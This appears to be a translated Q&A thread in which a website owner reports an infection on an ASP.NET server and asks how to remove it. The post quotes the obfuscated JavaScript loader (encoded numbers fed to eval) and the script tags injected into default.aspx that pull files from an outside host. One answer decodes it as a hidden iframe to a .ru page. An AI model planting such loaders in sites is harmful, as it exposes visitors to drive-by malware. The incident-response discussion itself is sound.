我认为我的网站被感染了

时间:2012-07-03 11:15:35

标签: javascript asp.net virus

这让我发疯了。我认为我的网站被某种病毒感染了,这就是正在发生的事情:

随机javascript文件出现在服务器上,其名称为jquery.ui.dialog.min.jsjquery.ui.button.min.js。所有这些文件都包含相同的代码:

s="";try{q=document.createElement("p");a=(q)?"appendChild":12;q[a]("123"+n);}catch(qw){f=(q)?"fromCharCode":2;h=-016/7;try{eval("a=prototype");}catch(zxc){e=window["e"+"va"+"l"];n="26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388.545.202.96.460.570.198.183.136.520.232.348.448.290.94.141.396.485.226.360.388.570.222.138.456.585.94.297.444.585.220.348.196.260.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456.170.64.345.396.570.222.324.432.525.220.309.244.170.194.351.464.555.68.96.408.570.194.327.404.490.222.342.400.505.228.183.136.550.222.102.128.485.216.315.412.550.122.102.396.505.220.348.404.570.68.96.416.505.210.309.416.580.122.102.200.170.64.357.420.500.232.312.244.170.100.102.248.300.94.315.408.570.194.327.404.310.78.123.236.65.20".split(".");if(window.document)for(i=6-2-1-2-1;-161+i!=2-2;i++){k=i;s=s+String[f](n[k]/(i%(h*h)+2));}e(s);}}

主要问题是这个“病毒”正在向我的default.aspx添加一行代码来破坏服务器。以下是它的补充:

<asp:Content ID="Content1" ContentPlaceHolderID="cphBody" Runat="Server">
//Code here
</asp:Content>**<script type="text/javascript" language="javascript" src="http://easydiablo3.com//ImageStorage/jquery.ui.button.min.js" ></script><script type="text/javascript" language="javascript" src="http://easydiablo3.com//themes/jquery.ui.dialog.min.js" ></script>**

如果我删除了他们刚刚出现的文件。有谁知道我怎么解决这个问题?

2 个答案:

答案 0 :(得分:2)

使用此链接检测受感染的文件/文件夹

http://sitecheck.sucuri.net/scanner/

答案 1 :(得分:1)

代码是eval()页面中的以下代码

<iframe src="http://caqxaro.ru/count14.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

您的应用程序中可能存在漏洞,检查数据库是否存在奇怪的值,如果您使用的是像joomla等CMS,请检查升级。如果可能的话,请恢复应用程序的最新备份。

相关问题
最新问题